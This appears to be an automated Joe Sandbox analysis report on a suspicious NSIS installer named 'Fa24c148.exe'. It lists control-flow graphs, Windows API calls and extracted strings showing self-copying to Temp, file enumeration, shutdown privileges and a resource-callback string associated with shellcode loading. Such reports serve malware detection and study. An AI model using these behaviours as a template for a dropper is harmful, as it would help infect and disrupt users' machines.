4034d6-4034e6 call 405553 ExitProcess 40->57 58 4035cc-4035d2 40->58 46 4034b1-4034b8 call 403741 41->46 47 403439-403444 call 4057ef 41->47 42->30 42->43 43->30 44->25 44->40 45->14 55 4034bd 46->55 61 403446-403457 47->61 62 40347b-403485 47->62 55->40 59 4035d4-4035f1 call 4060e1 * 3 58->59 60 40364f-403657 58->60 92 4035f3-4035f5 59->92 93 40363b-403646 ExitWindowsEx 59->93 66 403659 60->66 67 40365d-403661 ExitProcess 60->67 65 403459-40345b 61->65 68 403487-403495 call 4058ca 62->68 69 4034ec-403506 lstrcatW lstrcmpiW 62->69 72 403475-403479 65->72 73 40345d-403473 65->73 66->67 68->40 82 403497-4034ad call 405d77 * 2 68->82 69->40 75 403508-40351e CreateDirectoryW SetCurrentDirectoryW 69->75 72->62 72->65 73->62 73->72 78 403520-403526 call 405d77 75->78 79 40352b-403554 call 405d77 75->79 78->79 87 403559-403575 call 405d99 DeleteFileW 79->87 82->46 98 4035b6-4035be 87->98 99 403577-403587 CopyFileW 87->99 92->93 97 4035f7-4035f9 92->97 93->60 96 403648-40364a call 40140b 93->96 96->60 97->93 101 4035fb-40360d GetCurrentProcess 97->101 98->87 103 4035c0-4035c7 call 405c11 98->103 99->98 102 403589-4035a9 call 405c11 call 405d99 call 4054f2 99->102 101->93 109 40360f-403631 101->109 102->98 115 4035ab-4035b2 CloseHandle 102->115 103->40 109->93 115->98
                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 0040321E
                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403229
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403230
                                                                                                      • Part of subcall function 004060E1: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                      • Part of subcall function 004060E1: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                      • Part of subcall function 004060E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                                    • SHGetFileInfoW.SHELL32(00420658,00000000,?,000002B4,00000000), ref: 00403258
                                                                                                      • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                                    • GetCommandLineW.KERNEL32(004281A0,NSIS Error), ref: 0040326D
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Fa24c148.exe",00000000), ref: 00403280
                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Fa24c148.exe",00000020), ref: 004032A7
                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033B0
                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033C1
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033CD
                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033E1
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033E9
                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FA
                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403402
                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403416
                                                                                                    • OleUninitialize.OLE32(?), ref: 004034C6
                                                                                                    • ExitProcess.KERNEL32 ref: 004034E6
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Fa24c148.exe",00000000,?), ref: 004034F2
                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Fa24c148.exe",00000000,?), ref: 004034FE
                                                                                                    • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040350A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403511
                                                                                                    • DeleteFileW.KERNEL32(0041FE58,0041FE58,?,0042A000,?), ref: 0040356B
                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Fa24c148.exe,0041FE58,00000001), ref: 0040357F
                                                                                                    • CloseHandle.KERNEL32(00000000,0041FE58,0041FE58,?,0041FE58,00000000), ref: 004035AC
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 00403602
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363E
                                                                                                    • ExitProcess.KERNEL32 ref: 00403661
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: "C:\Users\user\Desktop\Fa24c148.exe"$1033$C:\Program Files (x86)\shaw$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Fa24c148.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu.tmp
                                                                                                    • API String ID: 4107622049-1635515615
                                                                                                    • Opcode ID: 7dc04cae1505df307541da29feb1b78f76a738656bf7d790261999e19a40ed68
                                                                                                    • Instruction ID: ad4a0f84636c0b66377e35c31726649c2eaf1ae8fb353dd82aac126218056701
                                                                                                    • Opcode Fuzzy Hash: 7dc04cae1505df307541da29feb1b78f76a738656bf7d790261999e19a40ed68
                                                                                                    • Instruction Fuzzy Hash: 99B1D030904210BAD7207F629D49A7B3EACEB45706F40497FF441B62E2D7BC9941CB6E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 116 405160-40517b 117 405181-40524a GetDlgItem * 3 call 403ff1 call 4048be GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40530c-405313 116->118 136 405268-40526b 117->136 137 40524c-405266 SendMessageW * 2 117->137 120 405315-405337 GetDlgItem CreateThread CloseHandle 118->120 121 40533d-40534a 118->121 120->121 122 405368-405372 121->122 123 40534c-405352 121->123 127 405374-40537a 122->127 128 4053c8-4053cc 122->128 125 405354-405363 ShowWindow * 2 call 403ff1 123->125 126 40538d-405396 call 404023 123->126 125->122 140 40539b-40539f 126->140 132 4053a2-4053b2 ShowWindow 127->132 133 40537c-405388 call 403f95 127->133 128->126 130 4053ce-4053d4 128->130 130->126 138 4053d6-4053e9 SendMessageW 130->138 141 4053c2-4053c3 call 403f95 132->141 142 4053b4-4053bd call 405021 132->142 133->126 143 40527b-405292 call 403fbc 136->143 144 40526d-405279 SendMessageW 136->144 137->136 145 4054eb-4054ed 138->145 146 4053ef-40541a CreatePopupMenu call 405d99 AppendMenuW 138->146 141->128 142->141 155 405294-4052a8 ShowWindow 143->155 156 4052c8-4052e9 GetDlgItem SendMessageW 143->156 144->143 145->140 153 40541c-40542c GetWindowRect 146->153 154 40542f-405444 TrackPopupMenu 146->154 153->154 154->145 157 40544a-405461 154->157 158 4052b7 155->158 159 4052aa-4052b5 ShowWindow 155->159 156->145 160 4052ef-405307 SendMessageW * 2 156->160 161 405466-405481 SendMessageW 157->161 162 4052bd-4052c3 call 403ff1 158->162 159->162 160->145 161->161 163 405483-4054a6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 4054a8-4054cf SendMessageW 163->165 165->165 166 4054d1-4054e5 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->145
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004051BF
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004051CE
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040520B
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 00405213
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405234
                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405245
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405258
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405266
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405279
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040529B
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004052AF
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D0
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052E0
                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052F9
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405305
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004051DD
                                                                                                      • Part of subcall function 00403FF1: SendMessageW.USER32(00000028,?,00000001,00403E1D), ref: 00403FFF
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405322
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000050F4,00000000), ref: 00405330
                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00405337
                                                                                                    • ShowWindow.USER32(00000000), ref: 0040535B
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405360
                                                                                                    • ShowWindow.USER32(00000008), ref: 004053AA
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053DE
                                                                                                    • CreatePopupMenu.USER32 ref: 004053EF
                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405403
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405423
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040543C
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405474
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405484
                                                                                                    • EmptyClipboard.USER32 ref: 0040548A
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405496
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004054A0
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004054B4
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004054D4
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004054DF
                                                                                                    • CloseClipboard.USER32 ref: 004054E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID: {
                                                                                                    • API String ID: 590372296-366298937
                                                                                                    • Opcode ID: da6ea4901efb283be28e634786642a951ca9a14736cadbfe75f68e92e901532f
                                                                                                    • Instruction ID: 0991f248181b02e880a99382a637b1aa596eb82eb2a2f586ae382473c4d6dcb0
                                                                                                    • Opcode Fuzzy Hash: da6ea4901efb283be28e634786642a951ca9a14736cadbfe75f68e92e901532f
                                                                                                    • Instruction Fuzzy Hash: 9CB15970900209FFEB219F60DD89AAE7B79FB04355F00807AFA01BA1A0C7755E52DF69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 408 405d99-405da4 409 405da6-405db5 408->409 410 405db7-405dcd 408->410 409->410 411 405dd3-405de0 410->411 412 405fe5-405feb 410->412 411->412 415 405de6-405ded 411->415 413 405ff1-405ffc 412->413 414 405df2-405dff 412->414 416 406007-406008 413->416 417 405ffe-406002 call 405d77 413->417 414->413 418 405e05-405e11 414->418 415->412 417->416 420 405fd2 418->420 421 405e17-405e53 418->421 422 405fe0-405fe3 420->422 423 405fd4-405fde 420->423 424 405f73-405f77 421->424 425 405e59-405e64 GetVersion 421->425 422->412 423->412 428 405f79-405f7d 424->428 429 405fac-405fb0 424->429 426 405e66-405e6a 425->426 427 405e7e 425->427 426->427 430 405e6c-405e70 426->430 433 405e85-405e8c 427->433 431 405f8d-405f9a call 405d77 428->431 432 405f7f-405f8b call 405cbe 428->432 434 405fb2-405fba call 405d99 429->434 435 405fbf-405fd0 lstrlenW 429->435 430->427 436 405e72-405e76 430->436 446 405f9f-405fa8 431->446 432->446 438 405e91-405e93 433->438 439 405e8e-405e90 433->439 434->435 435->412 436->427 442 405e78-405e7c 436->442 444 405e95-405eb2 call 405c44 438->444 445 405ecf-405ed2 438->445 439->438 442->433 454 405eb7-405ebb 444->454 447 405ee2-405ee5 445->447 448 405ed4-405ee0 GetSystemDirectoryW 445->448 446->435 450 405faa 446->450 452 405f50-405f52 447->452 453 405ee7-405ef5 GetWindowsDirectoryW 447->453 451 405f54-405f58 448->451 455 405f6b-405f71 call 40600b 450->455 451->455 459 405f5a-405f5e 451->459 452->451 457 405ef7-405f01 452->457 453->452 458 405ec1-405eca call 405d99 454->458 454->459 455->435 461 405f03-405f06 457->461 462 405f1b-405f31 SHGetSpecialFolderLocation 457->462 458->451 459->455 464 405f60-405f66 lstrcatW 459->464 461->462 465 405f08-405f0f 461->465 466 405f33-405f4a SHGetPathFromIDListW CoTaskMemFree 462->466 467 405f4c 462->467 464->455 469 405f17-405f19 465->469 466->451 466->467 467->452 469->451 469->462
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,?,00405058,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,00000000,0040FE48), ref: 00405E5C
                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405EDA
                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00405EED
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405F29
                                                                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00405F37
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00405F42
                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F66
                                                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,?,00405058,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,00000000,0040FE48), ref: 00405FC0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 900638850-1836753517
                                                                                                    • Opcode ID: bb187ed8235d5e602cac5fb493e7f0f28f0e0d380d5fcb884fe186b1f5943fdc
                                                                                                    • Instruction ID: 8be6bcb63ccaebc5f1bc3563bf1d434f80ac3f189a087fad5798c32c49afab67
                                                                                                    • Opcode Fuzzy Hash: bb187ed8235d5e602cac5fb493e7f0f28f0e0d380d5fcb884fe186b1f5943fdc
                                                                                                    • Instruction Fuzzy Hash: 3661D271A00906ABEF209F25CC44AAF37A5EF54314F10813BE955BA2D0D73D5A81CF9E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 470 4055ff-405625 call 4058ca 473 405627-405639 DeleteFileW 470->473 474 40563e-405645 470->474 475 4057bb-4057bf 473->475 476 405647-405649 474->476 477 405658-405668 call 405d77 474->477 479 405769-40576e 476->479 480 40564f-405652 476->480 483 405677-405678 call 40580e 477->483 484 40566a-405675 lstrcatW 477->484 479->475 482 405770-405773 479->482 480->477 480->479 485 405775-40577b 482->485 486 40577d-405785 call 4060ba 482->486 487 40567d-405681 483->487 484->487 485->475 486->475 494 405787-40579b call 4057c2 call 4055b7 486->494 490 405683-40568b 487->490 491 40568d-405693 lstrcatW 487->491 490->491 493 405698-4056b4 lstrlenW FindFirstFileW 490->493 491->493 495 4056ba-4056c2 493->495 496 40575e-405762 493->496 510 4057b3-4057b6 call 405021 494->510 511 40579d-4057a0 494->511 499 4056e2-4056f6 call 405d77 495->499 500 4056c4-4056cc 495->500 496->479 498 405764 496->498 498->479 512 4056f8-405700 499->512 513 40570d-405718 call 4055b7 499->513 502 405741-405751 FindNextFileW 500->502 503 4056ce-4056d6 500->503 502->495 507 405757-405758 FindClose 502->507 503->499 508 4056d8-4056e0 503->508 507->496 508->499 508->502 510->475 511->485 514 4057a2-4057b1 call 405021 call 405c11 511->514 512->502 515 405702-40570b call 4055ff 512->515 523 405739-40573c call 405021 513->523 524 40571a-40571d 513->524 514->475 515->502 523->502 527 405731-405737 524->527 528 40571f-40572f call 405021 call 405c11 524->528 527->502 528->502
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 00405628
                                                                                                    • lstrcatW.KERNEL32(dannebrogsordnen\gypseian.tof,\*.*,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 00405670
                                                                                                    • lstrcatW.KERNEL32(?,00409014,?,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 00405693
                                                                                                    • lstrlenW.KERNEL32(?,?,00409014,?,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 00405699
                                                                                                    • FindFirstFileW.KERNELBASE(dannebrogsordnen\gypseian.tof,?,?,?,00409014,?,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 004056A9
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405749
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405758
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
